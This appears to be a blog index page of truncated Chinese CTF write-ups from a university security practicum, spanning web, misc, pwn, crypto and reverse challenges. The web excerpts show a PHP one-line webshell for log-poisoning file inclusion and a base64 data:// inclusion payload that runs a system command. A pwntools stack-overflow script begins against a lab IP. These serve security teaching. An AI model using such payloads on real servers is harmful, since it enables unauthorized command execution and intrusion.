1.web-文件包含进阶 找apache的log日志,通过 POST 请求传入hust=/var/log/apache2/access.log设置 User-Agent 为 php 一句话木马 <?php system('cat fl4g.php');?> 查看源代码即可 2.web-简单文件上传 分析源码,考虑编写一句话木马,命名为C…
某校网安综合实践(三)-ctf比赛
某校网安综合实践(三)-misc
1.压缩包加解密 附件是压缩包,伪加密直接用winhex修改标志位解压。解压发现是张残缺的二维码,三个角的占位符缺失,用stegsolve颜色取反,再在网上找张占位符,调整大小贴上修复就可以扫码了, 2.文件识别、合并与分离 附件是压缩包,有密码,用winhex发现找不到504B0102 010editor甚至直接报错,考虑到名字叫fakezip,…
某校网安综合实践(三)-pwn
1.栈溢出 pwn入门题,栈溢出覆盖v3的值即可 解题脚本 from pwn import * host = '10.12.153.73' port = 10652 p = remote(host, port) p.sendlineafter(b"Enter your name:", b"111") payload = b'~' * 248 + p…
某校网安综合实践(三)-crypto
1.格密码 通过构建特定矩阵并应用LLL 算法,恢复密文c的明文,从而获取最终的标志字符串。 解题脚本 # 建议使用SageMath在线运行 # https://cocalc.com/features/sage from Crypto.Util.number import * from gmpy2 import invert h = 3119703…
某校网安综合实践(三)-reserve
1.静态调试-baby 逆向入门题。 解题脚本 input_string = "welcome_to_2024hustncc!!!!" str1 = [ 0x1, 0x8, 0x0F, 0x18, 0x1B, 0x5, 0x0C, 0x2C, 0x2B, 0x6, 0x2C, 0x6D, 0x51, 0x6D, 0x47, 0x1, 0x1…
某校网安综合实践(三)-web
1.文件包含 题目将文本"php"转换成"???",bp抓包用重放器 view-source:10.12.153.8:30719/?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= 或 view-source:10.12.153.8:30719/?file=da…